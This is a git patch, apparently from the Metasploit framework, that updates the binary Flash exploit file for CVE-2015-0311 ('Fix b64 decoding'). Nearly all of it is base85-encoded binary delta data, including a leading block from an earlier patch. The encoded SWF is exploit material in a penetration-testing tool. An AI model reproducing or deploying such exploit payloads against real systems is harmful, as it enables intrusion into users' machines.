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
V5qb-VXtSriZo?8}pa15$8`74)_N4#-


From 3e122fe87c327172c3d17e711172650d5427fca5 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 26 May 2015 15:15:33 -0500
Subject: [PATCH 0195/1013] Fix b64 decoding

---
 data/exploits/CVE-2015-0311/msf.swf | Bin 20531 -> 20410 bytes
 1 file changed, 0 insertions(+), 0 deletions(-)

diff --git a/data/exploits/CVE-2015-0311/msf.swf b/data/exploits/CVE-2015-0311/msf.swf
index 860efe1292298d18f43163f4d77d920d589fbe13..1f38921a2654c4e50f12af878923767cb3fccc64 100644
GIT binary patch
delta 20288
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
